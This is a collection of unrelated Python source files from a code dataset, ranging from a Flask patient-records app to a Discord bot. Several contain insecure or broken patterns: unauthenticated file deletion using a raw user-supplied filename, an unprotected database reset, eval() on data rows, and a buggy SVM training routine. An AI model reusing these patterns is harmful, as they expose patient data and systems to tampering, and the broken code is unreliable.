delete_patient_event(Id=None):\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n g.db.execute ('delete from patients where id = ?', [ Id ])\n g.db.commit() \n return redirect (url_for ('show_patients'))\n\n# XRAY & PICTURE PAGE #\n@app.route('/picture_library', methods = ['GET' , 'POST'])\ndef picture_library():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n isXray = request.args.get('isXray')\n cur = g.db.execute ('select * from images where patientID = ? and isXRay = ? order by id desc', [ Id, isXray ])\n if cur is None:\n flash ('Empty Library.') \n else:\n images = [ dict( Id = row[0] , patientID=row[1], filename=row[2], isXray=row[3] ) \\\n for row in cur.fetchall() ]\n \n #flash ('patientID: ' + str(Id) + 'isXray:' + str(isXray) + ' images:' + str(len(images))) \n session.mode = 'PICTURE'\n return render_template ('picture_library.html', images=images, Id=Id, isXray=isXray)\n\n@app.route('/normal_picture', methods = ['GET' , 'POST'])\ndef normal_picture(Id=None, isXray=False):\n Id = request.args.get('Id')\n redirect (url_for('picture_library', Id=Id, isXray=0))\n\n@app.route('/xray_picture', methods = ['GET' , 'POST'])\ndef xray_picture(Id=None, isXray=True):\n Id = request.args.get('Id')\n redirect (url_for('picture_library', Id=Id, isXray=1))\n\ndef allowed_file(filename):\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n \n@app.route('/upload_images_to_folder', methods=['POST'])\ndef upload_images_to_folder(Id=None):\n if not session.get('logged_in'): abort(401)\n # File ?\n if request.method == 'POST':\n isXray = request.args.get('isXray')\n patientID = request.args.get('Id')\n file = request.files['filesUpload']\n #for file in files:\n cur = g.db.execute ('insert into images ( filename ,isXray, patientID ) values ( ? , ? , ? )',\n [ file.filename,\n isXray,\n patientID ])\n g.db.commit()\n #flash ('Commited data > database. Uploading files..')\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(os.getcwd() + app.config['UPLOAD_FOLDER'], filename))\n flash ('Uploaded successfully.' +isXray)\n return redirect(url_for('picture_library',Id=patientID, isXray=isXray ))\n\ndef uploaded_file(filename):\n return url_for(app.config['UPLOAD_FOLDER'], filename=filename )\n\n@app.route('/remove_image')\ndef remove_image():\n Id = request.args.get('Id')\n filename = request.args.get('filename')\n isXray = request.args.get('isXray')\n patientID = request.args.get('patientID')\n # Remove from file.\n path = os.path.join(os.getcwd() + app.config['UPLOAD_FOLDER'], filename)\n if(os.path.isfile(path)):\n os.remove(path)\n # Remove from DB.\n g.db.execute ('delete from images where id = ?' , [ Id ])\n g.db.commit()\n flash('Removed Picture !')\n\n return redirect(url_for('picture_library',Id=patientID, isXray=isXray ))\n\n\n# SCHEDULE PAGE #\n@app.route('/show_schedule')\ndef show_schedule(Id=None):\n Id = request.args.get('Id')\n cur = g.db.execute ('select visitDate, price, note, doctor ,patientID, Id \\\n from schedules where patientID = ? order by visitDate desc', [Id])\n \n schedules = [ dict( visitDate=row[0] , price=row[1], note=row[2],\\\n doctor=row[3] ,patientID=row[4], Id =row[5] ) \\\n for row in cur.fetchall() ]\n session.mode = 'SCHEDULE' \n return render_template ('show_schedule.html', schedules=schedules , Id=Id )\n\n# ADD SCHEDULE PAGE #\n@app.route('/add_schedule')\ndef add_schedule():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n session.mode = 'SCHEDULE'\n return render_template('add_schedule.html', Id=Id)\n\n@app.route('/add_schedule_event', methods=[ 'POST' ])\ndef add_schedule_event():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n g.db.execute ('insert into schedules (visitDate, price, note, doctor ,patientID) values ( ? , ? , ? , ? , ?)',\n [request.form['visitDate'], \\\n request.form['price'],\\\n request.form['note'],\\\n request.form['doctor'],\\\n request.form['patientID']])\n patientID = request.form['patientID']\n g.db.commit()\n #flash('New schedule was successfully recorded.' + patientID + \"patientID\")\n return redirect (url_for ('show_schedule' , Id = patientID))\n\n# EDIT SCHEDULE PAGE #\n@app.route('/edit_schedule')\ndef edit_schedule():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n patientID = request.args.get('patientID')\n cur = query_db ('select id, visitDate, price, note, doctor ,patientID \\\n from schedules where id = ? 
and patientID = ?', [ Id, patientID ], True)\n if cur is None:\n flash ('Cur is None.')\n return redirect (url_for ('show_schedule'))\n else:\n session.mode = 'SCHEDULE'\n schedule = dict ( Id = cur[0],\\\n visitDate = cur[1],\\\n price = cur[2],\\\n note = cur[3],\\\n doctor = cur[4],\\\n patientID = cur[5]) \n #flash ('Test Data: Obj-Id: ' + str(cur[2]))\n return render_template ('edit_schedule.html', schedule=schedule )\n\n# EDIT SCHEDULE EVENT #\n@app.route('/edit_schedule_event', methods = ['POST'])\ndef edit_schedule_event(Id=None):\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n patientID = request.args.get('patientID')\n g.db.execute ('update schedules set \\\n visitDate = ? , \\\n price = ? , \\\n note = ? , \\\n doctor = ? where id = ? ',\n [request.form['visitDate'], \\\n request.form['price'],\\\n request.form['note'],\\\n request.form['doctor'],\\\n Id])\n g.db.commit()\n session.mode = 'SCHEDULE'\n flash('Saved Successfully.') \n return redirect (url_for ('show_schedule', Id = patientID))\n\n\n# DELETE SCHEDULE EVENT #\n@app.route('/delete_schedule_event')\ndef delete_schedule_event(Id=None):\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n patientID= request.args.get('patientID')\n g.db.execute ('delete from schedules where id = ?', [ Id ])\n g.db.commit()\n flash('Deleted successfully.')\n return redirect (url_for ('show_schedule', Id = patientID))\n\n# FIND PATIENT #\n#@app.route('/find_patient')\n#def find_patient_page():\n# return None\n\n# RESET DATABASE #\n@app.route ('/reset_database')\ndef reset_database():\n init_db()\n flash ('Database reset successfully.')\n return redirect (url_for ('show_patients'))\n\n# MAIN #\nif __name__ == '__main__':\n connect_db()\n app.debug = True\n app.run()\n #app.run(host='0.0.0.0')\n","sub_path":"PatientMan.py","file_name":"PatientMan.py","file_ext":"py","file_size_in_byte":12498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"140769472","text":"from mongoengine import Document, StringField, DictField\n\n\nclass Merchant(Document):\n title = StringField(required=True, db_field='t')\n mondo_id = StringField(required=True, unique=True, db_field='m')\n image_url = StringField(db_field='i')\n address = DictField()\n category = StringField()\n\n def to_dict(self):\n d = {\n \"id\": str(self.id),\n \"title\": self.title,\n \"mondo_id\": self.mondo_id,\n \"image\": self.image_url,\n \"address\": self.address,\n \"category\": self.category\n }\n return d\n\n meta = {\n \"indexes\": [\n {\"fields\": ['mondo_id'], 'unique': True},\n ]}\n","sub_path":"backend/core/models/merchant.py","file_name":"merchant.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32987138","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfile_name = 'hist_p0z.dat'\nfile_dir = '../dat/'\n\ndata = np.loadtxt( file_dir + file_name )\n\nplt.plot( data[:,0], np.log10(data[:,1]), '*' )\nplt.grid(True)\nplt.show()\n","sub_path":"ana/plot/plot_hist.py","file_name":"plot_hist.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"44112973","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport numpy as np\nimport pickle\nimport math\nfrom temp.features import get_features\n\n\ndef get_samples(_index, s_s_chs, sr, _size=1.3):\n\tinstances = 
[]\n\tfor _ind in _index:\n\t\tinstances.append(s_s_chs[_ind:int(math.ceil(_ind + (_size * sr)))][:])\n\treturn np.array(instances)\n\n\ndef get_subdataset(_S=1, Sess=1):\n\t_file = 'train/Data_S%02d_Sess%02d.csv' % (_S, Sess)\n\t_f = open(_file).readlines()\n\tchannels = []\n\t_header = []\n\tfor i, _rows in enumerate(_f):\n\t\tif i > 0:\n\t\t\tchannels.append(eval(_rows))\n\t\telse:\n\t\t\t_header = _rows\n\t\t\t_header = _header.split(',')\n\treturn np.array(channels), np.array(_header[1:-1])\n\n\ndef get_dataset(subject=1, session=1):\n\tsr = 200\n\tch_fs_instances = []\n\tch_tags_instances = []\n\ts_s_chs, _header = get_subdataset(subject, session)\n\t_index = [i + 1 for i, d in enumerate(s_s_chs[:, -1]) if d == 1]\n\tinstances = get_samples(_index, s_s_chs, sr)\n\tfor f_instance in range(1, 3): # len(instances) 60 instances\n\t\tinstance = np.array(instances[f_instance, :, 1:-1]).transpose()\n\t\tch_fs_instances.append(get_features(instance))\n\t\tch_tags_instances.append('subject_{0}'.format(subject))\n\treturn {\"data\": ch_fs_instances, \"target\": ch_tags_instances}\n\n\ndef eval_model(dataset, clf):\n\tfalse_accepted = 0\n\tOk_accepted = 0\n\ttotal_tags = len(dataset['target'])\n\tfor i, unk_entry in enumerate(dataset['target']):\n\t\ttrue_tag = dataset['target'][i]\n\t\tfeature_vector = np.array([dataset['data'][i]])\n\t\tprint(\"feature_vector: \", np.shape(feature_vector))\n\t\tprediction = clf.predict(feature_vector)[0]\n\t\taccuracy = max(max(clf.predict_proba(feature_vector)))\n\t\tresult_ = \"True label: {0}, prediction: {1}, accuracy: {2}\".format(true_tag, prediction, accuracy)\n\t\tprint(result_)\n\t\tif true_tag == prediction:\n\t\t\tOk_accepted += 1\n\t\telse:\n\t\t\tfalse_accepted += 1\n\tprint('Ok_accepted {0}'.format(Ok_accepted))\n\tprint('false_accepted {0}'.format(false_accepted))\n\tprint('accuracy of Ok_accepted {0}'.format(round(Ok_accepted / total_tags, 10)))\n\tprint('accuracy of false_accepted {0}'.format(round(false_accepted / total_tags, 10)))\n\n\nsubject = 1\nsession = 1\ndataset = get_dataset(subject, session)\nmodel = open('clf.sav', 'rb')\nclf = pickle.load(model)\neval_model(dataset, clf)\n","sub_path":"temp/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"306086792","text":"# Import Dependencies\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import func\n\nfrom flask import Flask, jsonify\nimport datetime as dt \nimport pandas as pd \n\n# Database Setup\nengine=create_engine('sqlite:///hawaii.sqlite')\n\n# declare a Base using 'automap_base()'\nBase=automap_base()\n\n#use the Base class to reflect the database tables\nBase.prepare(engine, reflect=True)\n\n# Assign the station class to a variable called 'Station'\nStation=Base.classes.station\n\n#Assign the measurement class to a variable called 'Measurement'\nMeasurement=Base.classes.measurement\n\n#Create a session\nsession=Session(engine)\n\n#Flask Setup\napp=Flask(__name__)\n\n#add Flask Routes\n# http://localhost:5000/\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/start
\"\n f\"/api/v1.0/start_end\"\n )\n \n\n\n#http://localhost:5000/api/v1.0/precipitation\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n \"\"\"Query for the dates and temperature observations from the last year.\n Convert the query results to a Dictionary using date as the key and tobs as the value.\n Return the JSON representation of your dictionary.\"\"\"\n\n query_date=dt.date.today()-dt.timedelta(days=365)\n #if we need the whole year of observation (starting from the latest date in our db)\n #uncomment the block of the code below:\n \n #ldate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n #l=ldate[0]\n #latest_date=pd.to_datetime(l).date()\n #query_date =latest_date-dt.timedelta(days=365)\n\n date_prcp=(session.query(Measurement.date,Measurement.prcp)\n .filter(Measurement.date>=query_date).all())\n dict_prcp=dict(date_prcp)\n return jsonify(dict_prcp)\n \n#http://localhost:5000/api/v1.0/stations\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n \"\"\"Return a JSON list of stations from the dataset.\"\"\"\n station_list=session.query(Station.station).all()\n # Convert list of tuples into normal list\n new_station = [row[0] for row in station_list]\n return jsonify(new_station)\n\n#http://localhost:5000/api/v1.0/tobs\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n \"\"\"Return a JSON list of Temperature Observations (tobs) for the previous year\n for station with the highest number of observations, 'USC00519281'.\"\"\"\n query_date=dt.date.today()-dt.timedelta(days=365) \n #if we need the whole year of observation (starting from the latest date in our db)\n #uncomment the block of the code below:\n \n #ldate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n #l=ldate[0]\n #latest_date=pd.to_datetime(l).date()\n #query_date =latest_date-dt.timedelta(days=365)\n\n tobs_list=(session.query(Measurement.tobs).filter(Measurement.station=='USC00519281')\n .filter(Measurement.date>=query_date).all()) \n new_tobs= [row[0] for row in tobs_list]\n return jsonify(new_tobs)\n\n\n\n#http://localhost:5000/api/v1.0/start\n@app.route(\"/api/v1.0/start\")\ndef start():\n \"\"\"Return a JSON list of the minimum temperature, the average temperature, \n and the max temperature for for all dates greater than and equal to the start date.\"\"\"\n start_date=input(\"Enter start date in 'YYYY-mm-dd' format:\")\n ldate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n l=ldate[0]\n if start_date>l:\n print(f\"There are no observations for your date. The latest date is {l}\")\n return(\"There are no observations for your date.\")\n else:\n temp=(session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs))\n .filter(Measurement.date>=start_date).all())\n\n return jsonify(temp[0]) \n\n#http://localhost:5000/api/v1.0/start_end\n@app.route(\"/api/v1.0/start_end\")\ndef start_end():\n \"\"\"Return a JSON list of the minimum temperature, the average temperature, \n and the max temperature for for all dates between the start and end date inclusive.\"\"\"\n start_date=input(\"Enter start date in 'YYYY-mm-dd' format:\")\n end_date=input(\"Enter end date in 'YYYY-mm-dd' format:\")\n if start_date > end_date:\n print(\"Wrong period. Your start date is greater than end date.\")\n return(\"Wrong period. 
Your start date is greater than end date.\")\n else:\n ldate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n l=ldate[0]\n if start_date>l:\n print(f\"There are no observations for your dates. The latest date is {l}\")\n return(\"There are no observations for your dates.\")\n else:\n temp=(session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs))\n .filter(Measurement.date>=start_date)\n .filter(Measurement.date<=end_date)\n .all())\n return jsonify(temp[0])\n\n\n\nif __name__=='__main__':\n app.run(debug=True)","sub_path":"HW-11-Adv-Data-Storage-Retrieval/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"316122972","text":"from requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nimport json\n\n\ndef simple_get(url):\n try:\n with closing(get(url)) as resp:\n if check_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n\n\ndef get_json(url):\n try:\n with closing(get(url)) as resp:\n resp = resp.content.decode(\"utf-8\")\n if validate_json(resp):\n return resp\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n\n\ndef check_response(resp):\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef validate_json(resp):\n try:\n json.loads(resp)\n return True\n except ValueError as e:\n print(e)\n return False\n\n\ndef log_error(e):\n print(e)\n","sub_path":"instagram_scrapper/src/request_tools.py","file_name":"request_tools.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322665998","text":"import os, json, cv2, numpy as np, string, logging\nimport descriptor as des\n\ndef train(descriptor_type, agregator_type, path_to_pos_data, path_to_neg_data, sample_save_path, label_save_path):\n \n file = open(sample_save_path, 'w')# to create the file or reclean it\n file.close()\n \n samples = []\n labels = []\n \n pos_samples, pos_labels = des.DataForm(path_to_pos_data, 1)\n samples.append(pos_labels)\n labels.append(pos_labels)\n logging.debug('Positive labels are',pos_labels)\n logging.info('Added positive labels')\n neg_samples, neg_labels = des.DataForm(path_to_neg_data, -1)\n samples.append(neg_labels)\n labels.append(neg_labels)\n logging.debug('Negative labels are',neg_labels)\n logging.info('Added neggative labels')\n \n file = open(label_save_path, 'w')\n file.write(json.dumps(labels))\n file.close()\n \n samples = [des.ImagDescr(LBP, sum, cv2.imread(filepath),sample_save_path).cash() for filepath in samples]\n \n SVM = cv2.ml.SVM_create()\n SVM.setKernel(cv2.ml.SVM_LINEAR)\n SVM.setP(0.2)\n SVM.setType(cv2.ml.SVM_EPS_SVR)\n SVM.setC(1.0)\n SVM.train_auto(train, cv2.ml.ROW_SAMPLE, labels)\n logging.info('trained svm')\n logging.debug('retval?',SVM)\n response = SVM.predict(train)\n logging.info('calculated prediction')\n logging.debug('responce length is %s, labels length is %s', len(response), len(labels))\n \n for i in range(len(response)): \n true_positive = 0\n if response[i] == labels[i]:\n true_positive += 1\n accuracy = true_positive/len(response)\n \n 
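# The accuracy loop above re-initialises true_positive on every iteration, the
# computed accuracy is never returned or logged, `samples` collects the label
# lists where the file paths were meant, `LBP`/`sum` are not valid descriptor
# arguments here, and `train` names the enclosing function rather than the
# training matrix. A minimal corrected sketch of the same routine, assuming
# des.DataForm returns (file_paths, labels) and des.ImagDescr(...).cash()
# yields one feature vector per image (both inferred from the calls above):
#
#     pos_samples, pos_labels = des.DataForm(path_to_pos_data, 1)
#     neg_samples, neg_labels = des.DataForm(path_to_neg_data, -1)
#     paths = pos_samples + neg_samples
#     labels = np.array(pos_labels + neg_labels, dtype=np.int32)
#     feats = np.array([des.ImagDescr(descriptor_type, agregator_type,
#                                     cv2.imread(p), sample_save_path).cash()
#                       for p in paths], dtype=np.float32)
#     svm = cv2.ml.SVM_create()
#     svm.setKernel(cv2.ml.SVM_LINEAR)
#     svm.setType(cv2.ml.SVM_C_SVC)
#     svm.trainAuto(feats, cv2.ml.ROW_SAMPLE, labels)  # note: trainAuto, not train_auto
#     predicted = svm.predict(feats)[1].ravel()
#     accuracy = float((predicted == labels).sum()) / len(predicted)
#     return accuracy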
\n","sub_path":"svm/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653630408","text":"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n# Importing dataset\ndataset = pd.read_csv('Data.csv')\nX= dataset.iloc[ : , :-1].values\nY= dataset.iloc[ : , 3].values\nprint('origin \\n\\nX=\\n', X , '\\n\\nY=\\n' , Y , '\\n')\n\n\n\n# Handling the missing data\nImputer = SimpleImputer(missing_values = np.nan, strategy = \"mean\")\nImputer.fit(X[:,1:3])\nX[ : , 1:3] = Imputer.transform(X[ : , 1:3])\n\nprint('Handling the missing data \\n\\nX=\\n', X ,'\\n')\n# Encoding categorical data\nlabelencoder_X = LabelEncoder()\n# X第一列的文字 = LabelEncoder轉換成數字(只針對第一列)\nX[ : , 0] = labelencoder_X.fit_transform(X[ : , 0])\n\nlabelencoder_Y = LabelEncoder()\nY = labelencoder_Y.fit_transform(Y)\nprint(' Encoding categorical data \\n\\nX=\\n', X , '\\n\\nY=\\n' , Y ,'\\n')\n\n# Creating a dummy variable\nonehotencoder = OneHotEncoder(categorical_features=[0], dtype=int)\nX= onehotencoder.fit_transform(X).toarray()\nprint('Creating a dummy variable \\n\\nX=\\n', X,'\\n')\n\n#Splitting the datasets into training sets and Test sets\nX_train, X_test, Y_train, Y_test = train_test_split( X , Y , test_size = 0.2, random_state = 0)\nprint('training sets and Test sets\\nX_train=\\n', X_train,\"\\nX_test\\n\",X_test,'\\nY_train=\\n', Y_train,\"\\nY_test\\n\",Y_test,'\\n')\n\n#Feature Scaling\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.fit_transform(X_test)\n\nprint('Feature Scaling\\nX_train=\\n', X_train,\"\\nX_test\\n\",X_test,'\\n')","sub_path":"DAY1.py","file_name":"DAY1.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228720826","text":"'''\n @file allknn.py\n @author Marcus Edel\n\n Class to benchmark the flann All K-Nearest-Neighbors method with kd-trees.\n'''\n\nimport os, sys, inspect, shlex, subprocess\n\n# Import the util path, this method even works if the path contains symlinks to\n# modules.\ncmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(\n os.path.split(inspect.getfile(inspect.currentframe()))[0], \"../../util\")))\nif cmd_subfolder not in sys.path:\n sys.path.insert(0, cmd_subfolder)\n\nfrom util import *\n\nclass FLANN_ALLKNN(object):\n def __init__(self, method_param, run_param):\n # Assemble run command.\n self.cmd = run_param[\"flann_path\"] + \"allknn\"\n if \"datasets\" in method_param:\n # If the dataset contains two files then the second file is the query\n # file.\n dataset = check_dataset(method_param[\"datasets\"], [\"csv\", \"txt\"])\n if len(dataset) == 2:\n self.cmd += \" -r \" + dataset[0] + \" -q \" + dataset[1]\n elif len(dataset) == 1:\n self.cmd += \" -r \" + dataset[0]\n if \"k\" in method_param:\n self.cmd += \" -k \" + str(method_param[\"k\"])\n if \"seed\" in method_param:\n self.cmd += \" -s \" + str(method_param[\"seed\"])\n if \"epsilon\" in method_param:\n self.cmd += \" -e \" + str(method_param[\"epsilon\"])\n self.cmd += \" -v\"\n\n self.info = \"FLANN_ALLKNN (\" + self.cmd + \")\"\n self.timeout = run_param[\"timeout\"]\n self.output = None\n\n def __str__(self):\n return self.info\n\n def metric(self):\n 
try:\n self.output = subprocess.check_output(self.cmd, stderr=subprocess.STDOUT,\n shell=True, timeout=self.timeout)\n except subprocess.TimeoutExpired as e:\n raise Exception(\"method timeout\")\n except Exception as e:\n subprocess_exception(e, self.output)\n\n metric = {}\n timer = parse_timer(self.output)\n if timer:\n metric['runtime'] = timer[\"tree_building\"] + timer[\"computing_neighbors\"]\n metric['tree_building'] = timer[\"tree_building\"]\n metric['computing_neighbors'] = timer[\"computing_neighbors\"]\n\n return metric\n","sub_path":"methods/flann/allknn.py","file_name":"allknn.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"50237516","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nfrom unittest import TestCase\n\nfrom tests.utils import assert_equal_dict, assert_tensors\n\nfrom polyaxon_schemas.ml.losses import (\n AbsoluteDifferenceConfig,\n ClippedDeltaLossConfig,\n CosineDistanceConfig,\n HingeLossConfig,\n HuberLossConfig,\n KullbackLeiberDivergenceConfig,\n LogLossConfig,\n MeanSquaredErrorConfig,\n PoissonLossConfig,\n SigmoidCrossEntropyConfig,\n SoftmaxCrossEntropyConfig\n)\n\n\nclass TestLossConfigs(TestCase):\n @staticmethod\n def assert_equal_losses(l1, l2):\n assert_tensors(l1.pop('input_layer', None), l2.pop('input_layer', None))\n assert_tensors(l1.pop('output_layer', None), l2.pop('output_layer', None))\n assert_equal_dict(l1, l2)\n\n def test_base_losses_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n\n config_classes = [\n AbsoluteDifferenceConfig,\n MeanSquaredErrorConfig,\n HingeLossConfig\n ]\n\n for config_class in config_classes:\n config = config_class.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_log_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'epsilon': 0.0001,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = LogLossConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_clipped_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'clip_value_min': -0.1,\n 'clip_value_max': -0.1,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = ClippedDeltaLossConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_huber_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'clip': 0.1,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = HuberLossConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_softmax_crossentropy_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'label_smoothing': 0.,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = SoftmaxCrossEntropyConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_sigmoid_crossentropy_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'label_smoothing': 0.,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = SigmoidCrossEntropyConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def 
test_cosine_distance_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'dim': 0,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = CosineDistanceConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_poisson_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = PoissonLossConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_kullbackleiber_div_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'dim': 0,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = KullbackLeiberDivergenceConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n","sub_path":"tests/test_ml/test_losses.py","file_name":"test_losses.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"80770615","text":"import discord\nimport asyncio\nimport os\nimport re\nimport json\nimport random\nimport datetime\nimport logging\nfrom dotenv import load_dotenv\nfrom discord.ext import commands, timers, tasks\nfrom discord.utils import get\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\nuser_data = 'users.json'\n# LOGGING\nLOG_FORMAT = '%(levelname)s %(asctime)s - %(message)s'\nlog_path = os.path.join(os.getcwd(), 'bot.log')\nlogging.basicConfig(filename=log_path, level=logging.INFO, format=LOG_FORMAT)\nlogger = logging.getLogger()\n\nprint('starting up bot...')\nbot = commands.Bot(command_prefix='--')\n\ncogs = ['music', 'coffee']\n\ndef get_users(file):\n with open(file, 'r', encoding='utf8') as f:\n users = json.load(f)\n return users\n\ndef save_users(file, users):\n with open(file, 'w', encoding='utf8') as f:\n users = json.dump(users, f, indent=4, ensure_ascii=False)\n\n\n@bot.event\nasync def on_ready():\n ready = f'\\==== [{bot.user.name} has connected to Discord] ====/'\n for cog in cogs:\n bot.load_extension(f'cogs.{cog}')\n print(f'> Loaded {cog} cog')\n print(ready)\n logger.info(ready)\n\n loop_beans.start()\n print('loop_beans started')\n\n@bot.event\nasync def on_member_join(member):\n '''\n Automatically assign new members 'Customer' role\n '''\n logger.info(f'{member} joined the server.')\n role = get(member.guild.roles, name='Customer')\n await member.add_roles(role)\n'''\nasync def secret_message(message):\n name = message.author\n if name == 'adri' and '' in message:\n resp = ''\n if name == 'maqic' and '' in message:\n resp = ''\n if name == 'Beianp' and '' in message:\n resp = ''\n if name == 'ctrl_alt_del' and '' in message:\n resp = ''\n'''\n@bot.event\nasync def on_message(message):\n if message.author == bot.user:\n return\n msg = message.content\n welcome_responses = ['You\\'re very welcome.', 'My pleasure.', 'Of course.']\n if all(word in msg.lower() for word in ['thanks', 'robo', 'waiter']):\n await message.channel.send(random.choice(welcome_responses))\n\n unwelcome_responses = ['Much to your dismay, crime is not the solution.']\n if any(word in msg.lower() for word in ['overthrow', 'revolt', 'assassinate', 'steal', 'stab','kill']):\n await message.channel.send(random.choice(unwelcome_responses))\n\n resp = ['Hmm, you seem anxious or overexcited. 
Perhaps try --setmood rain.', 'Everything will be alright.']\n if bool(re.match(r'^[A-Z ]{15,100}$', msg)):\n await message.channel.send(random.choice(resp))\n\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n \n await coffee_cog.update_data(users, message.author)\n await coffee_cog.add_beans(users, message.author, 1)\n \n save_users(user_data, users)\n await bot.process_commands(message)\n'''\n@bot.event\nasync def on_error(event, *args, **kwargs):\n if event == 'on_message':\n logger.warning(f'ERROR in: {event}')\n'''\n\n\n\n@bot.command(name='beans')\nasync def beans(ctx):\n '''\n Check how many beans you have.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n beans = coffee_cog.get_beans(users, user)\n await ctx.message.delete()\n\n embed = discord.Embed(color=discord.Color.greyple())\n embed.description = f':coffee: {user.mention}, you have {beans} coffee beans.'\n\n await ctx.send(embed=embed)\n logger.info(f'{user} requested to see their beans in 